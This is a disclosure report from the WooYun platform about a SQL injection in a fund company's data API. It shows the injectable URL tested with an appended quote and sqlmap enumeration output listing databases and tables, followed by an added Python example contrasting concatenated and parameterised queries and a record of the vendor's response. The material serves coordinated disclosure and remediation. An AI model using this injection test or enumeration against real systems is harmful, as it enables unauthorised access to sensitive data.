Vulnerability summary

Defect ID: wooyun-2015-0140841

Title: SQL injection in an important subsite of 万银财富 Fund (DBA privileges + tens of millions of sensitive records exposed)

Vendor: 万银财富

Author: 路人甲

Submitted: 2015-09-15 14:39

Fixed: 2015-11-01 15:56

Published: 2015-11-01 15:56

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-15: details sent to the vendor, awaiting vendor handling
2015-09-17: vendor confirmed; details visible to the vendor only
2015-09-27: details opened to core white hats and relevant domain experts
2015-10-07: details opened to regular white hats
2015-10-17: details opened to intern white hats
2015-11-01: details opened to the public

Brief description:

SQL injection running with DBA privileges, which can expose tens of millions of sensitive records.

Detailed description:

While testing, a request to the following address was captured:
http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001

[Screenshot 0-0.jpg: response to the original request]

Test:
http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001'

[Screenshot 0-1.jpg: response with a single quote appended to indexid]

The two pages are different, so the indexid parameter is injectable.
What is this data for? Surely it wouldn't leak anything?
Straight to sqlmap for a test: it turns out the account has DBA privileges, and there are tens of millions of records!~~~

[Screenshots 1.jpg to 7.jpg: sqlmap output]

I won't test this information any further!~~~

available databases [6]:
[*] caihui
[*] caihui1
[*] cqgd
[*] information_schema
[*] mysql
[*] performance_schema
Database: caihui1
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| cihdquote | 12172659 |
| etfcrstocks | 10143050 |
| newstype | 9003508 |
| chdquote | 8853576 |
| chdquote_copy | 8018850 |
| cihdquote_copy | 7231993 |
| newsindus | 6946815 |
| newsfin | 3851068 |
| fundbdy | 2605306 |
| nav | 2211012 |
| dernav | 2210817 |
| encurnav_der | 2205481 |
| newsauth | 1606726 |
| fhdquote | 1528331 |
| tab_comp_ma | 1515590 |
| tab_comp_macd | 1515590 |
| tab_comp_rsi | 1515590 |
| tab_comp_temp_kdj_lh | 1515590 |
| tab_comp_temp_lh | 1515590 |
| tab_comp_kdj | 1484053 |
| sholding | 1209250 |
| profchg | 944152 |
| sholding_s | 882554 |
| iport | 637662 |
| itprofile | 536543 |
| dispara_fund | 502629 |
| `itprofile-20140614` | 471439 |
| iport_s | 467840 |
| chgrf_f | 448683 |
| finfo | 396251 |
| nav_cur | 391090 |
| curnav_der | 388823 |
| uplog | 376388 |
| lfshare | 336837 |
| tstat | 259997 |
| `finfo--` | 257218 |
| fparty | 254925 |
| temp_stock_list_jj | 210589 |
| bsholding | 176373 |
| benchmark_comparison | 141219 |
| scfp_new | 127732 |
| symbol_comp | 103747 |
| unicst_new | 101801 |
| newstext | 99915 |
| chgrf | 97491 |
| securitycode | 86094 |
| etfcrinfo | 77937 |
| `securitycode---` | 73742 |
| securitycode_copy | 73620 |
| chgrf_20141030 | 72602 |
| mfdhispd | 67056 |
| ntrad | 63208 |
| icst | 63085 |
| fratios | 62316 |
| scstc | 61189 |
| fundshare_chg | 59409 |
| qdshold | 54710 |
| fholder | 48682 |
| new_funds_index_wy | 47760 |
| fshare | 47305 |
| new_funds_index_wy_1121 | 46280 |
| fundtypes | 45954 |
| tradedate | 45580 |
| assetal | 44100 |
| new_funds_index_wy_2 | 43940 |
| new_funds_index_wy_4 | 43638 |
| new_funds_index_wy_3 | 43460 |
| wy_tab_gp_week | 35948 |
| p_record | 33645 |
| bsheet | 22569 |
| wy_tab_gp_mothlow | 21775 |
| scfp | 21541 |
| fholder_chg | 21511 |
| assetal_copy | 20929 |
| assetal_copy1 | 20929 |
| bsheet_new | 20413 |
| icst_new | 19581 |
| fundsta | 15409 |
| tab_fixedinvestment | 12456 |
| qdiport | 11778 |
| wy_tab_gp_week_h | 9864 |
| tab_symbol_rank | 9486 |
| fundmg | 9399 |
| jjtzbz | 9385 |
| tab_comp_ma_120 | 9369 |
| fund_diagnose_record | 9172 |
| fpchg | 8942 |
| temp_manager_performance | 8764 |
| dhistory | 7056 |
| csholding | 6872 |
| prizestate | 6512 |
| fcmg | 6491 |
| tab_comp_ma_120_bak | 6250 |
| temp_fundtype_wy | 5557 |
| wy_tab_gp_quarter | 5314 |
| avgrmmonf | 4870 |
| temp_stock_chg | 4453 |
| temp_stock_chg_jj | 4453 |
| temp_stock_chg_test | 4453 |
| jjzx | 4425 |
| mfdhistory | 4182 |
| temp_manager_performance_jj | 4149 |
| tab_comp_uplog | 4092 |
| fund_benchmark | 3925 |
| temp_gr_year | 3708 |
| jjglr | 3701 |
| jjtgr | 3697 |
| temp_buy_info | 3697 |
| temp_issue | 3697 |
| temp_main_fund | 3697 |
| ofip | 3638 |
| ofprofile | 3638 |
| qdfhold | 3547 |
| temp_info_new | 3542 |
| wycf_zq_temp_ph | 3542 |
| temp_asset | 3493 |
| temp_nav_ofund | 3152 |
| wycf_zq_temp_nav_ofund | 3152 |
| wycf_zq_temp_fhb | 3039 |
| temp_status | 3034 |
| tab_pzx | 2941 |
| tab_dxfzbj | 2927 |
| wycf_zq_howbuy_ph | 2863 |
| wy_tab_gp_symbol | 2553 |
| wycf_zq_howbuy_kfnav | 2479 |
| `ofprofile-20140604` | 2329 |
| temp_manager_new | 2197 |
| wycf_zq_sina_ph | 2000 |
| curfscode | 1912 |
| temp_issue_jj | 1777 |
| temp_nav_ofund_jj | 1767 |
| temp_info_new_jj | 1734 |
| risk_assessment_wy | 1703 |
| wycf_zq_nav | 1694 |
| wycf_zq_tt_ofund | 1685 |
| jjjj | 1492 |
| temp_manager_new_jj | 1466 |
| temp_status_jj | 1407 |
| fcowner | 1172 |
| dsmeeting | 1089 |
| tab_comp_symbol | 1089 |
| fundsaiv | 1063 |
| csrcappfin | 1055 |
| temp_bonus | 1040 |
| tab_recommendlog | 967 |
| ifundos | 922 |
| v9_symbols | 843 |
| dhistory_dispara | 838 |
| qdbhold | 690 |
| temp_bonus_jj | 669 |
| rating_wy | 636 |
| temp_split | 599 |
| cxfundname | 589 |
| itnews | 549 |
| tab_tg_jjtj | 520 |
| temp_nav_curfund | 485 |
| wycf_zq_temp_hb | 485 |
| wycf_zq_temp_nav_hbfund | 485 |
| temp_nav_strufund | 355 |
| fundda | 344 |
| wycf_zq_howbuy_fbnav | 333 |
| wycf_zq_howbuy_ph_hb | 333 |
| company_rating_wy | 298 |
| fundiconvert | 283 |
| fsmeeting | 246 |
| temp_nav_curfund_jj | 227 |
| tsmeeting | 224 |
| temp_split_jj | 210 |
| fcshare | 188 |
| tab_jmtj_mc | 156 |
| tab_jmtj_chang | 144 |
| wycf_zq_sina_hbfund | 140 |
| tab_gptj_mc | 112 |
| temp_nav_strufund_jj | 106 |
| temp_company_stat | 102 |
| tab_jmtj_duan | 93 |
| downstate | 89 |
| cfip | 88 |
| cfprofile | 59 |
| tab_gptj_chang | 55 |
| tab_invest_reinforcement | 51 |
| fegather | 48 |
| tab_jmtj_zhong | 46 |
| tab_invest_wave_band | 43 |
| tab_gptj_zhong | 41 |
| tab_gptj_duan | 38 |
| companycomm | 35 |
| companycomm_bak | 35 |
| jjxldy | 29 |
| temp_nav_cfund_jj | 22 |
| tablehy07051 | 19 |
| tablehy07052 | 19 |
| tablehy07053 | 19 |
| tablehy1 | 19 |
| tablehy2 | 19 |
| tablehy3 | 19 |
| temp_stock_list | 13 |
| temp_aa | 12 |
| table07051 | 10 |
| table07052 | 10 |
| table07053 | 10 |
| table1 | 10 |
| table2 | 10 |
| table3 | 10 |
| tablez1 | 10 |
| jjxljj | 9 |
| tab_jmtj | 9 |
| tab_tg_nxyj | 8 |
| cfunds_net_wy | 7 |
| tab_jmtj_mc_copy | 7 |
| tab_tg_jjyj | 7 |
| temp_nav_cfund | 7 |
| tablez07052 | 5 |
| tablez07053 | 5 |
| tablez3 | 5 |
| tablez07051 | 4 |
| wycf_zq_tttempzhishu | 3 |
| wycf_zq_zhishu | 3 |
| tab_tg_flmc | 2 |
| tab_comp_logrecorder | 1 |
| tab_new_jjld | 1 |
| temp_bb | 1 |
+-----------------------------+---------+

Proof of vulnerability:

As above

Fix recommendation:

Filter the input
Restrict the database account's privileges
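The two fix recommendations above, filtering the input and not letting the web application touch the database as a DBA, are illustrated here in an added example that is not part of the original report and not code from the wy-fund.com site. The report never shows the source of api.php, so the vulnerable function below is an assumption about why appending a single quote produced a different page: the `indexid` parameter is spliced straight into the SQL text. The table, column and sample rows are constructed, and SQLite stands in for the MySQL server in the sqlmap output so the example runs offline.

```python
"""Added example (not from the report): the assumed defect behind the
`indexid` injection, next to an input-validated, parameterised version.

Assumptions, none of which are confirmed by the report:
  - api.php concatenates the raw `indexid` query parameter into its SQL;
  - the data lives in a table like the constructed `fund_index` below.
"""
import sqlite3
from typing import Callable, List


def make_db() -> sqlite3.Connection:
    """Constructed sample data; table and column names are invented."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fund_index (indexid INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO fund_index VALUES (?, ?)",
        [(885001, "sample index A"), (885002, "sample index B")],
    )
    return conn


def get_same_index_vulnerable(conn: sqlite3.Connection, indexid: str) -> List[str]:
    """Assumed defective pattern: untrusted input becomes part of the query text.

    A quote in `indexid` changes the SQL grammar, so the database answers
    with an error instead of rows, which is the "different page" the report
    observed.
    """
    sql = f"SELECT name FROM fund_index WHERE indexid = '{indexid}'"
    return [row[0] for row in conn.execute(sql)]


def validate_indexid(raw: str) -> int:
    """Allow-list validation (the report's "filter" fix): indexid must be a
    plain decimal integer, so anything else is refused before SQL is built."""
    if not raw.isdigit():
        raise ValueError("indexid must be a decimal integer")
    return int(raw)


def get_same_index_fixed(conn: sqlite3.Connection, raw_indexid: str) -> List[str]:
    """Validated input plus a parameterised query: the value is bound by the
    driver and never enters the SQL text, so it cannot alter the statement."""
    indexid = validate_indexid(raw_indexid)
    sql = "SELECT name FROM fund_index WHERE indexid = ?"
    return [row[0] for row in conn.execute(sql, (indexid,))]


Handler = Callable[[sqlite3.Connection, str], List[str]]


def classify(conn: sqlite3.Connection, handler: Handler, raw: str) -> str:
    """Summarise how a handler reacts to an input, for side-by-side comparison.

    Returns "rows:N" for a normal answer, "sql_error" when the input broke the
    SQL statement (the database itself complained), and "rejected" when the
    validation layer refused the input before any query ran.
    """
    try:
        return f"rows:{len(handler(conn, raw))}"
    except sqlite3.OperationalError:
        return "sql_error"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    db = make_db()
    for value in ("885001", "885001'"):
        print(
            f"indexid={value!r}: "
            f"vulnerable -> {classify(db, get_same_index_vulnerable, value)}, "
            f"fixed -> {classify(db, get_same_index_fixed, value)}"
        )
```

For a valid id both handlers return the same row, but the quoted input that the report used as its test makes the concatenated query fail at the database while the hardened handler rejects it before any SQL is built. The second recommendation, restricting privileges, is not something application code can show: it means giving the web application its own database account with `SELECT` on the handful of tables the API actually reads, rather than a DBA account that can enumerate every database and table, as the sqlmap output above shows was possible.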

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-09-17 15:54

Vendor reply:


CNVD confirmed and reproduced the described situation; the case has been forwarded by CNCERT to the securities industry's information-technology regulator, which will coordinate handling with the website's operating unit.

Latest status:

None yet